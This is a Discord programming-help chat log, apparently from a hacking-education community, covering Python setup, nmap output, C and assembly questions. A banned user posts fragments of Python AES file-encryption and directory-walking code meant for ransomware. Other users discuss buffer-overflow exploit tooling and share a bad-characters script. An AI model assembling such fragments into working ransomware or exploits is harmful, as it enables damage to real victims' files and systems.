#programming

This script works for other people in internet, but didn't work for me

This is the script: https://gist.github.com/pdelteil/6ebac2290a6fb33eea1af194485a22b1

A: Its python 2

B : You havent installed termcolor? It clearly states in the error its not installed so go install it :P pip2 install termcolor

@lilac holly

wow nice! Let me test

I already have termcolor

Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (1.1.0)

read it again

your using pip3 for that

** /usr/lib/python3**/dist-packages (1.1.0)

Run this command

python2 -m pip install termcolor

@lilac holly

Yeah, but I can't run pip2

I will try

I can't run this

@surreal bronze

what OS do you use?

have you tried it with sudo?

sudo apt install python-pip

Or for python3 sudo apt install python3-pip

@lilac holly

hey can anyone tell which is the best place to learn python? And is it worth learning python 2 ?

Udacity and Udemy

and 2nd question

Yeah it's worth learning

any specific course ??

https://www.udacity.com/course/introduction-to-python--ud1110
Visit this link and u r all done with python

also learnpython.org

I had just completed from this site

kali

I'll try

Do what jabba said

sudo apt install python-pip

@lilac holly

Nice, I did

Yeah, but I get the same error

U have to import the module called termicolor

I need to import the module in the script code or in the my pc?

I checked the code and is already imported. Then, I need to import the module "termcolor" in my pc, right?

@lilac holly in the screenshots you’ve provided you haven’t used pip to install termcolor

Yeah, I already tried, but "Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (1.1.0)
"

The commands you need to run are:

sudo apt-get install python-pip
python2 -m pip install termcolor
python2 -m pip install requests

OR

sudo apt-get install python-pip
pip install termcolor 
pip install termcolor

That’s python3 not otthin2

Python2*

You may need to find the package name

Google

“How to install python2 pip”

Or

“How to install pip2”

On Kali Linux of course

Yeah, let me try. Thank you so much

wget https://bootstrap.pypa.io/get-pip.py
python2 get-pip.py
pip2 install termcolor requests

@lilac holly

That method isn’t very good K4oS or else I’d recommend it

It’s unstable

I used it in all my machines lol

but its true that its unstable

As it’s in the Kali repo, use the Kali repo

The problem is that it says no instalation candidate and prompts you to install python3-pip, which is for python3 pip

So i dont really know if there is a way to get python2 pip in kali repos

Thats why I use the commands i sent earlier

It's not in the Kali repo anymore

That's literally the only way to do it now

Rip

My Kali is so outdated then

Offsec in all their wisdom decided to remove support for the most commonly used exploit language from their pentesting distro

Idiots

Manjaro better

If you disagree you’re wrong

lol

In that case I apologise :)

no need to

You were not wrong, thats the way to install it. Its just that offsec removed it, so its offsecs problem lol

Pfft gonna make my own OS

I’ll call it

Jabbos

lol

What's wrong?

@red canopy

Errored out

let me see if there is a fix

Nice

pip2 install -U setuptools

pip2 install termcolor requests

That should do it

at least worked for me

@lilac holly

It worked!

Amaizing!

Thank you so much @red canopy

you're welcome!

I think its because pip2 comes with an old version of setuptools. The -U updates it, then it doesn't error out

Ahhh, probabily yes

can someone explain to me why this function makes my program crashes?
void reverse(node *head)
{
node * prev, next;
node *current = *head;
while(current!=0)
{
next = current->next;
current->next = prev;
prev = current;
current = next;
}
( * head) = prev;
}

What program?

is it because in the current->next = prev line prev hasn't been initialized yet?

I found my CLRS book after weeks of searching for it

Constantly Losing Ramen Sauce?

Cool & Lazy Roman Sausages?

Cyber Law and Real Superheroes

thou shalt not jest about the CS Bible

Cormen, Leiserson, Rivest, and Stein's "Introduction to Algorithms Third Edition"

Shot in the dark.. but would anyone have a clue what the encoding of this string might be, if I say it doesn't seem like base64 BSzN6uy2dDcolImpMKxffg==

It could be base64 happily

Just not base64 encoded ascii data

What's that from?

i guess you might be right, as it does in fact decode 🤔 It is from a private CTF outside of THM. But I am totally stuck and just looking for anything to get me moving again 😅 So thanks! 😄

remember that base64 can have multiple alphabets and not just the most popular one defined in the RFC standard :(

Also, bee time for you to plug ciphey

oh yes

https://GitHub.com/Ciphey/ciphet

https://GitHub.com/Ciphey/ciphey

my ciphy broke, but I think its my machine

🤩

Thanks guys! Definitely checking out Ciphey 🙂 "Bruteforcing" it on CyberChef right now to check the alphabet thing

it's very unlikely because the only people that know about that are those that read RFcs

there's 2 main alphabets for base64 tho

could also be base62 or 58 as they both use equals iirc

Thanks for the help 😄 I can't get Ciphey to work, but I'll pop by the Discord

why not>

Whats up with it?

I think the problem is on my end.. python install might be all over the place

Got it to run on the VM, but not in my WSL or on Windows

ahhh okay

windows

😛

...yup!

One thing; how are you able to run it without python -m ciphey ? Alias?

uh

ciphey

its a command 😄

hmm... I can't get that to happen 🤷🏻‍♂️ But I might be better of uninstalling everything and trying again

ah

python not in path

i think

it should say when you install ciphey in the long list of things its doing

"your python bin is not in path, add it by doing this"

I think I have owned 3 different copies of that - 1 for home, 1 for school/office, 1 for the ereader

Set up a virtual environment then install the package into that instead of the global python env - I've had problems with incompatible dependencies installing every module I've run across into the global env

Hi guys, do you have some advice to convert python2 script to exe file for a buffer overflow exploitation ?

Why do you want to convert it to an exe?

To execute it on local

The binary which is vulnerable open a local port

I cannot do local port frwd

Ok, pivot instead. Tunnel your traffic.

I bet you can

I tried, even with a meterpreter on the machine ..

Doesn’t work

Try chisel or something

Yes but the I m very restricted on the machine, I tried many things and my python version of the exploit works on my test environment, so I want to convert it to execute it

pyinstaller is good but probably wont work for BoF

It does

I create my payload with msfvenom, -f c, what’s Wrong ?

@subtle coyote

#room-help

Wut

python > *

ok I'm here

You use () when referring to or defining function's

function_name(args)

I love C so much but I think the thing is, if you learn Python first, you will have a tendency for pythonic looking code

vs someone like me who all my Python code looks very C like

I agree a bit

And which do you find more clean?

I think it is nice to learn a language that doesn't implicitly declare variable types first

Although we do have pep-8 standards

well Python is cleaner looking

Because it makes you understand more how the program works

if you learn python first you're gonna have a hard time adjusting to low level code later on imo

anyone suggest me any book which can teach programming concepts from scratch like how coding works algorithms etc...

so after learning high level language would be easy

any seniour

that's what i think

i have a blog where i teach computer science, i am currently revamping it for 2021 rn so its a lil broken but the content is still good:

https://skerritt.blog

Great but can you suggest my any book

Like bible book

introduction to algorithms by CLRS

if you want the bible

Yeah actually i want to learn and understand like what processes take place behind any high level language

this is that book

you will learn the algos behind high level languages

like open addressing in hash table collisions

Hello, my name is Eric Zhu and I am from AcademiaEdge, a nonprofit startup powered by teenagers. We strive to make coding easier to learn and more accessible to everyone. Currently, we have python, web development, machine learning, C#, and scratch. Anybody who is skilled enough to teach any coding language, pls dm me!

If you can help us with this project, it can be used as volunteering hours for college applications or job resumes.

AN ethical hacking course is going to be lit

So you want people here to teach code for free.

its for volunteer hours and for your resume!

pretty sweet deal

employers always look for teaching roles

Yikes

pretty nice

Idk sounds kinda exploitative to me

'Powered by teenagers'

It’s the scratch course for me. A+ coding experience.

I’d like to see the course projects for the rest as well. I wonder if he’s got anyone teaching them yet.

Paid in exposure

You can put something like that as experience that’s not bad for someone who hasn’t graduated college yet

Yeah this straight up sounds like exploiting teenagers though lmao

if they took out "powered by teenagers" and replaced it with "helping teenagers" that would be a lot better

I mean even then

an internship helps with experience because you have older and more experienced people to help you

this is straight up just getting free work from teenagers

I make between 700 and 1000 a month while teaching for THM as a teenager why would I want to teach for your platform and make no money with less experienced people?

bro thats a lot

in USD? it really isn't, that close to minimum wage

passively

yes it is

ok, for residuals that's a different story

Because we are trying to introduce coding to more people

@lilac holly how is your platform different than the others that currently fill that need? What's your business model look like? I get that it's a non profit, do you have 501c3 accreditation? So far, you sound like every business student who's approached me to 'get in on the ground floor of their stunning and brave facebook clone that totally isn't facebook'

Friend, I’m obviously looking for work in the wrong places.

We do have a 501c3 accreditation and we are a proud partner of hack club bank! Also we partnered up with https://sciovirtual.org/ which is a huge science olympiad tutoring program!

Right... So you want free expertise to teach people things that they can already find for free on the internet.

Good job on ducking all the other questions though; the misdirection to sciovirtual was a nice touch.

idk if i'm being stupid but how do i use "from" in a function parameter in python?

i'm using an api and one of the params to this function is "from" but py3 won't let me use it since it's a keyword and it just breaks

.create(to="abc", from="def") to give an example

keywords are bad to use as variable names

i usually replace to,from with src,dst

yea you're being stupid

i didn't say they're not

but i'm not the one that made the api

can you link the library?

https://www.textmagic.com/docs/api/send-sms/

use case looks to be using a RESTful api

pass the params into a GET request, should be golden

i know

but i'm using the python implementation

make the GET in postman, export it as python code

ezpz

What exactly are you trying to do? Just trying to send a message?

i know i can do those thank you, but i'm not looking for a workaround, i'm wondering how to use that parameter in python

yes

Some keywords you can over-write; 'from' is on the list of reserved keywords, so you cannot use from as anything but the reserved keyword. If the parameter acutally has to be called 'from', the only other way i can think of is to use it as a positional argument instead of named argument.

Either that, or write your own module for the textmagic library and submit a PR for it

https://twitter.com/AmeliaGanAI/status/1339762754823995393?s=20

data structure and algos should be learned with python or C/C++

@stone kayak

Is that a question?

Because you can use basically any language

My degree teaches it in Python, Java, and JS

Yeah question but someone told me better with C/C++

I'd say that's probably not good advice

Use a language that you know

The focus should be the data structures and algorithms. Not struggling with a programming language you don't know

For strict algo work a language with strong typing and actual garbage collection and/or properly managed memory is probably best

IMHO

But hey use whatever you're most familiar with, it all gets turned into machine code at the end

u can learn Ds and Algo in any language.. unis usally teach in C/C++ because of additional irritating concepts in them

use a language that ur comfortable with

is it possible that all the ports are open? https://paste.pythondiscord.com/ixuvayitah.yaml

did a Comprehensive Scan

-v -sS -sV -sC -A -O

If all the ports are open at once... That would be the most vulnerable system known to man.

hmm okay

https://tenor.com/view/jerry-funny-animal-laughing-gif-13124924

you are not joking though right?

cuz that gif confused me lol

If every port was open simultaneously?

it's not a joke

yes

those machine do not exist at present

may be in future

Think about it. you need an open port to access a system, then work out how to exploit it. Now imagine there are thousands of open ports. Or entry-points.

Many of the THM machine have 2-5 ports open for various services. And they are designed to be vulnerable.

Each port has the potential to be open.

lol that's why all the ports are open

🤦

not

not open

..?

If all the ports are open on a system, you would literally need to smile at the machine to gain access.

that's why all ports are not open

It's like leaving all your windows and doors open

if you scan the THM machine ip all the ports are open?

no it's like not having any walls in your house

only 2-3

what

I deploy the machine copy the ip and scan and in open ports it show all of them simultaneously from 1-1024

then i don't know

No. The deployable machines in THM are designed to be vulnerable in one way or another. Those machines, which are DESIGNED to be hacked, usually have 2 to 5 ports open. They are VULNERABLE with that amount of ports. Now imagine if ALL were open.

it not possible

Arnav - It's reaaaaaallly unlikely that every port will be open.

so you mean there is something wrong with my code?

And this script passes values into an Nmap command, right?

Not your code. Your though process has a couple of flaws.

Honestly, I could make head nor tail of your code

elif response == '3':
    print(f'nmap version : {scanner.nmap_version()}')
    scanner.scan(ip_add, '1-1024', '-v -sS -sV -sC -A -O')
    print(scanner.scaninfo())
    print(f'IP Status : {scanner[ip_add].state()}')
    print(scanner[ip_add].all_protocols())
    print(f'Open Ports : {scanner[ip_add]["tcp"].keys()}')
```This is the code for Comprehensive scan

esqy is not a programmer...so he can't tell that

using python-nmap moduel

I mean this gives all the ports open

from 1 to 1024 simultaneously

it's impossible that a ip is showing all ports open..

https://tenor.com/view/impossible-heres-my-answer-not-happening-gif-12692184

I mean

let me check with the original nmap

yeah..u can confirm with that

if all ports are open.. then thats a robbed machine

so where it shows how many ports are open in the nmap?

"invitation to be robbed"

Initiating SYN Stealth Scan at 17:30
Scanning 10.10.3.253 [1000 ports]
Completed SYN Stealth Scan at 17:31, 7.25s elapsed (1000 total ports)
Nmap scan report for 10.10.3.253
Host is up (0.057s latency).
All 1000 scanned ports on 10.10.3.253 are filtered

Arnav - Have you ever run an nmap scan?

yes

filtered does not mean open...forgive me if i am wrong

I think the best approach, would be for you to run nmap scans on computers where you know what the output will be. THM beginner rooms would be good for that. Then you have an expected output, and can verify if it's correct

what does filtered mean

This script is just passing parameters to an nmap command, it should be easy to verify it by.. just running the command.

this means that the host dropped probes to those ports what does this mean

firewall

Filtered means that something is taken away

so.. my output is wrong then?

So it could be that the ports are closed or otherwise inaccesible

Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time.

You tell me. Run a simple nmap scan on the target (not a -A, as that'll take forever) and see what output you get

I ran -v -sS and that is the output I get

bye bye...........then you can't tell that all ports are opne

filtered does not means open...it means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.

now it is discovering open ports

idk what happened last time

at least the problem got solved

https://tenor.com/view/tranquillo-tranquilla-tranquille-tranquilli-va-tutto-bene-gif-13972745

does this tell something? Raw packets sent: 1354 (59.552KB) | Rcvd: 1314 (57.816KB)

I think you are over-complicating this script, Arnav. Do the Nmap rooms on THM and get a better understanding of the program and how it works

You script looks like it's just... well, building the command in it's code. And looks like you are hardcoding it.

I didn't hardcode it

Shrug. You can.

Be the easist way, depending on what you want to acheive

I just wanna know which port is open

This is something everyone wants to know

wait a min

I think it is working

You have selected : 1
nmap version : (7, 91)
{'tcp': {'method': 'syn', 'services': '1-1024'}}
IP Status : up
['tcp']
Open Ports : dict_keys([21, 554])
```I got only 2 open ports which means it is a success

so that means that ip really had so many ports open

??

@sage oxide

Yeah..now it's working..

so many messages

Possible @obsidian mirage

weird

java or C++ imi

CP with python tho

But I’m learning C

Learning C then data structure algos and Assembly after that Python and ruby

@stone kayak What would you say about it

Python is a good starting point

Yeah but then you can’t learn C easily which giving time issues and you can’t do exploit development shellcoding that’s all

Once you learn Assembly then you can learn any language easily

C is low compared to python so learn C and then algos and assembly

C is goood 🙂

if you want to learn programming, Python isn't the best first language. C / C++ is tbh

I learned from C

I would suggest C

When you go from Python to C, you have to learn everything all over again.

When you go from C to Python, you already know how Python works deeply 😛

And after that when u come to python..everything would be easy for you

@stone kayak yeah...

when you go from C to Python, all your python code looks like C, ask me how I know 🙂

is open port 21 and 554 common

do you know what port 21 is? what does port 554 show up as?

port 21 is FTP right

I mean where the FTP servers open

yes, its common enough but not used as much these days due to being in plaintext

ok

I've never seen a THM system with tcp port 554 though

does THM deploy ip has all the ports open?

Can anyone help me with a codewars kata?

That’s a fact

https://www.codewars.com/kata/58ad317d1541651a740000c5/train/javascript

https://hastebin.com/nusufilibi.csharp

I guess there is like a pattern I need. Something like: middle character goes first, then …

@sage oxide when ever I do -v -sS scan with the ip with my script it gives all open port

It must be showing all ports are filtered. If it's showing all open...then something is wrong...

@obsidian mirage

My script doesn't tell filtered ones

so do you think my script is considering filtered as opened?

but that would be dumb

I dont like discrete math :(

its easy, whats not to like in it?

You'll love discrete math when you have to work out the correct pattern of outlook filters. Easily the MOST useful day-to-day application of discrete in the workplace.

Which framework /language is easy for back-end?

Many startups use Django (Python), Flask (Python), and NodeJS (JavaScript) as their backend frameworks. Python and JavaScript are easy-to-learn and therefore considered the best programming languages to learn for beginners. Moreover, both of them also provide a huge market opportunity.

ruby on rails powers both github and shopify so that's a good option! 🙂

From my brother who creates many professional websites for a living, he says to use "laravel", which is a PHP framework

"easy for backend" is a tough question. Easy in what sense? I prefer backend to be written in a different language than front end, especially since typescript-related languages have problems with namespacing. Picking a language is about selecting the one that will cause the least problems for your project goal

Php is good and is still used in many places so, thats one of the option

I use golang for 99.9% of my backend dev

hi anybodys how to trace Phonenumber?

@humble venture

Ya yeet

They're gone

Thanks James! Was about to mute and farm it out to one of you guys 😄

thats interetsing

everyone always says to start with python

I didn't know C was a better starting point

I tend to use JavaKotlin for backend, but not everyone likes the JVM

Kotlin/Native is starting to get interesting

C is much lower. I would always recommend starting with a high level language and working down

Python, for example, being a prime example

High level languages are easier to work in, which means they're a more a gentle introduction to programmatical constructs/thinking.

If you want to become a programmer, I would advise starting with a lower level language like C. You'll learn things that you can't pick up in a higher level language (like how to find the maximum of an array, how hashmaps work etc).

For infosec you don't really need to know that stuff

CS50 starts with C and ends with Python which is grandddd

is that the Stanford course?

Harvard 🙂

But it's taken at Stanford

its by Harvard, but students at Stanford take it If I recall

They flex about how it's the largest course at Harvard & Stanford in their first lecture I think

there was like some course advertised widely, I figured that is what you were talking about

like they were offering an online version as a real course

but I see it now

can someone help with a python stuff?

im having trouble adapting a function of encryption to my original script

Could you show us..

no show only ask

mh ok

function to file path:
`def define_full_path():
path = ["/home/user/Desktop/atmbeggar/encryptdir/"]
for i in path:
for root,dirs,files in os.walk(i):
for file in files:
for extension in file.split("."):
if file.endswith(extension):
fullpath = os.path.join(root, file)

define_full_path()`

this where my two function one to encrypt the other to define path

need to os.walk into directory/directories

but here i was using an rsa key

and i was trying to adapt it to use an aes key (with the intention later to encrypt the aes with the rsa public)

but anyway

ive found on the doc this function:

`def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

if not out_filename:
    out_filename = in_filename + '.enc'

iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)

with open(in_filename, 'rb') as infile:
    with open(out_filename, 'wb') as outfile:
        outfile.write(struct.pack('<Q', filesize))
        outfile.write(iv)

        while True:
            chunk = infile.read(chunksize)
            if len(chunk) == 0:
                break
            elif len(chunk) % 16 != 0:
                chunk += ' ' * (16 - len(chunk) % 16)

            outfile.write(encryptor.encrypt(chunk))`

to use aes to encrypt, so i was having trouble to adapt it to the current scenario

Ok, so what are you trying to accomplish here? @lilac holly

im trying to adapt the function above to encrypt files with aes

to my older scenario:
`def define_full_path():
path = ["/home/user/Desktop/atmbeggar/encryptdir/"]
for i in path:
for root,dirs,files in os.walk(i):
for file in files:
for extension in file.split("."):
if file.endswith(extension):
fullpath = os.path.join(root, file)

define_full_path()`

What's the high level goal of the project?

im trying to write a ransomware in python for an assignment

ransomware

yeah but totally just for the sake of experience

it's an assignment

Assignment

Can you show us the assignment brief?

Oh he gone

They're banned, jabba. Check mod chat

Yeah I noticed haah

Can anyone share programming pathway need to share with someone in general chatroom

theres some pinned resources!

In c++, is there any downside to opening lots of file descriptors on the same file? (lots = number of threads in my case, so [4..32]-ish)

(read only)

unless you are opening enough to thrash the heap, it's the same cost per descriptor

if you are actually loading data into memory, there may be race conditions and thrashing happening in your code though

you'll have to do profiling to determine that if you see anything weird or slow happening

I'm not to worried about thrashing, after attempting a word from the wordlist, it leaves the scope and should be destructed. There isn't any "persistent" memory. I just wanted to make sure there aren't any obvious "gotcha's" that I'm missing.

I'll do some more profiling to make sure this scales well. Thanks @magic falcon

I may sound like an idiot but i am trying to put together a badchars script in python to make my life easier which accepts a default value, it works to some extent but fun thing is that it picks only 1 value like:

#!/usr/bin/python3
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("chars",nargs="?", default=1, type=str)
args = parser.parse_args()

chars = str(args.chars)
print(chars)

listRem = chars.split("\\x")
for x in range(1, 256):
    if "{:02x}".format(x) not in listRem:
        print("\\x" + "{:02x}".format(x), end='')
print()

\\x01,\\x02,\\x03
\x01\x02\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Without quotes it gives exactly the same output, it just seems to remove \x03 instead of all

Hello, was wondering if it is okay to learn 2 languages at once (actually 3 if you include bash) or is it a bad strategy?

@faint sparrow 👀 got any help for me

nvm i was stupid

╰─ ./bad.py \\x01\\x02\\x03   
\x01\x02\x03
\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

how much experience do you have?

@stone kayak not a lot, i have forgotten everything, so probably beginner

Stick with one until you get the basics down

@brazen eagle thanks

Don't split yourself into trying to learn multiple syntax for the semantics of a program - you'll have a better experience focusing on a primary language (I prefer compiled - YMMV), and learning just enough bash to be able to run that toolchain

@magic falcon oh, why do you prefer compiled? Thanks for advice!

You learn more about memory model; it's a bit heavier lift on the front end

if you are brand new and aren't taking courses, i suggest python or go - python isn't usually compiled, but both are pretty accessible to new programmers.

If you have some programming experience, I think C++ is a better language to learn, as there is a LOT more to learn once you aren't so focused on just getting the semantic meaning put down into proper syntax.

I could go on a bit of a tangent of what Modern C++ (C++11 and newer) entails, but I'll spare that until someone starts asking more questions about variadic metaprogramming and such 🙂

I dont take any courses and wanted to learn python, it is needed both for security stuff (my hobby) and automation testing ( thing i need to know to get a testing job)

that's not a bad place to start

start talking about integrating SAST into your automation pipeline

Oh, i dont work anywhere yet, only myself to talk to :D

Sast?

Static Analysis Security Testing

Basically it's a linter that looks for insecure patterns of code

Googled it, sounds useful

it's a big step in security maturity for a dev team to have it

from my experience, having someone on the team who can at least talk about it really really useful during security and compliance audits

if your company has any 3rd party framework accreditations, see if you can get some face time with one of them between audits and see what you and your team can do for the SDLC portion(s) of their audits

they'll be thrilled

Oh, as an unemployed person that was hard to understand :D

it will make sense someday 🙂

3rd party frameworks are related to industry specific needs, like FedRAMP, financial, or healthcare. those aren't the only categories, but commonly seen ones

I had a very small introduction to C btw, how is it different from C++?

Sure, thanks

C++ is actually made up of 4 languages

Modern C++ is C, the C++ core language, the STL, and custom templates (variadic metaprogramming)

C is a proper subset of C++

Oh, that is hard

if anyone claims they are truly an expert at C++, doubt them

i think i'm barely competent, because there is so much to learn about it and all the sweet code tricks

I actually had to learn C non stop for a month in a very stressful coding school

Ok

CppCon is a great youtube channel to learn more about the language

The only thing I remember is malloc and pointers

most of that has been done away with

modern style guides are pass by reference, pass by reference by reference, less often pass by value, and RAII for memory management

the biggest 'production' value that C++ brings, IMO, is concurrency. Python for all its strengths, is really really bad at concurrency and parallel compute.

Seems like i personally wont need that info for a long time :D

But it sounds interesting

Why would you need concurrency btw?

say you have to sort an enormous array, multiple disks worth of data. Do you want to run all that single threaded on the same core?

concurrency lets you split up the sort task into smaller chunks

parallel compute is a subset of concurrency, that lets you take those smaller chunks and distribute them among multiple cores on the same computer, or even across multiple computers

for funsies, someone made a beowulf compute cluster out of furbies i think 10 years ago

Wow

looking for a little help with python and scapy what to first confirm that what i want to do is even possible..... any expert out there kindly dm me

just ask the question here :)

what are some good techniques and approaches to nail programming down? starting from C# and C++ here

then i'll head to Python

What are your goals? What kind of project are you working on? Do you know any other programming languages?

'nail programming down' is going to be a pretty fluid answer, depending on what you are actually trying to accomplish

My goals are to honestly be solid

in C#, C++ and Python

especially python since it's so world renowed and widely used

there's a lot to unpack there. Making inroads on C++ and python will be easier with a project in mind. Is there a particular feature or featureset you are trying to deepdive?

C# is going to be a hot mess, due to the weirdness of safe and unsafe code blocks - I know people like it, but it's not a language I care to spend more time in than necessary

I'd say stick with safe code in C# until you come up with something that absolutely needs unsafe code

Are SVGs exported from draw.io accessible? I can't find any info and my screenreader sucks :l

Yes they are, but its better to export charts/diagrams as a png/Jpeg.. SVG sometimes get weird (for me)

How so? 🙂

I'm interested because I want them to be accessible to all 😄

Heyy, so this year i'm learning c++ at school for a semester, then java for the other, and i wanted to ask, should buy c++ primer and dive in it as much as i could to learn everything about c++ or should i concentrate more on a scripting language like python ? To be clearer, i want to learn a language to the tiniest detail, should it be c++, java or python ?.

concentrate on C++

If you learn C++ in depth, you can easily learn Python in depth

same with Java

Buy "The C++ Programming Language" by Bjarne Stroustrup. He invented C++ and that's a 1400 page book that dives deep into C++ 😄

Thank you so much, because i really liked c++ but i was afraid if i'm gonna dive in a 1000 pages book its gonna take a significant time that could've been spent on learning security.

The C++ Primer is a good intro level book, but it barely gets more than surface level in a lot of areas

Hi Guys I just made A Python script used to automate the execution of the following tools : Nmap , Nikto and Dirsearch but also to automate the report generation during a Web Penetration Testing
Can I post the github link here ?

Could anyone give me a good book reference for c

reference or learning?

https://devdocs.io/c/ is good reference

Learning

Anyway thanks a lot

If you are new to C try CS50's Introduction to Computer Science, it's pretty good.

yeah the CS50 course from Harvard has lots of good reviews

Personally, I found K&R C to be a good book to learn from

So easy to forget 🙂 read that book years ago, then back to my normal dayjob with php and web garbage, have to re-learn how to handle stuff in C every time i do something in it 🙂

🧠 🔫

Thanks a lot guys for your advice

does anyone know what this does

if [[ -e php ]]; then echo "PHP" else

Checks if php fie exists, echoes PHP, in that case

does it check the whole system or the current directory?

never used that parameter, so i guess maybe whats available in path, otherwise id use -f

-e flag instructs the script to exit if any error

it goes like set -e if i remember correctly.

"-e operator : This operator checks weather the given file exits or not. If it exits this operator returns true otherwise false."

i read it wrong 🙂 exits

He's right

Thats a confusing description

current working directory "wherever the script is"

can i make it check in $PATH

i mean u can probably do something like this if u want to check if PHP is there in path:

if [[ -z `which php` ]]
then
  echo "no php"
else
  echo "php"
fi

I'm doing the python room, and I have to decode a string encoded 5 times in base64, 5 times in base32, 5 times in base 16. I did this and it works until base32 decodeing.

@tight halo #room-hints but you're doing it backwards

16 first

And also it's not gonna work due to your variables

You're not saving the value between loop passes

I have the following asm file:

`section .text
global main ;must be declared for linker (ld)

main: ;tell linker entry point
mov edx,9 ;message length
mov ecx, stars ;message to write
mov ebx,1 ;file descriptor (stdout)
mov eax,4 ;system call number (sys_write)
int 0x80 ;call kernel

mov eax,1 ;system call number (sys_exit)
int 0x80 ;call kernel

section .data
stars times 9 db '*'`

After executing nasm -f elf32 stars.asm and gcc -m32 stars.o -o stars - I get two warnings:
/usr/bin/ld: stars.o: warning: relocation in read-only section .text /usr/bin/ld: warning: creating DT_TEXTREL in a PIE

Any idea?

@rugged tulip nasm -felf64 thingo.asm && ld thingo.o

@quiet falcon
But what if I want to compile it into 32b?
And why should I use ld and not gcc?
Thank you

there are no c functions that im aware of

just need to link it

@quiet falcon
Okay, so for 32b we have to compile it using:
nasm -felf64 thingo.asm && ld -m elf_i386 thingo.o

But this warn:
ld: warning: cannot find entry symbol _start; defaulting to 000000000000401000

still exists

Why can't I use main instead of _start?

k,
ld -e main

main is more of a c thing

Thank you dude!

np

str = """f0h@f0j0%! a)K!F49h!FFOK"aaa"
"2f0h@f0j0%! a)K!F49h!FFOK"aaa"
v=spf1 include:_spf.google.com (http://_spf.google.com/) ~all
"2f0h@f0j0%! a)K!F49h!FFOK"aaa"
v=spf1 include:_spf.google.com (http://_spf.google.com/) ~all"""

In this str, I have to catch the lines of v=spf1...
When I use this regex: v=spf1.* in regexr.com - it catches the suitable two lines as needed

when I run in python re.match(str, r'v=spf1.*') - nothing is caught
Why is that?

Isn't it re.match(pattern, string)

https://docs.python.org/3/library/re.html#re.match

If you are typing any code or blocks of code, please use the Discord code markdown by surrounding the text with the ` symbol.

thanks esqy ❤️

Or preferably the ``` symbol for a block of text

e.g.
Test text

Better still, ```LANGUAGE

e.g.
```python
print("Hello")
```

As that will give syntax highlighting

❤️ ❤️ thanks for this esqy and muir!

can u pin ur msg as well? @tulip sail

Ok it doesn't work well because it's seperate messages

dont use ``, use $()

$() is posix, `` is nonstandard and has weird nesting mechanics

yeah u are right

If you are typing any code or blocks of code, please use the Discord code markdown by surrounding the text with the ` symbol, or for a block of text, the ``` symbol.
e.g.

Test text

Better still, ```LANGUAGE
e.g.
```python
print("Hello")
```

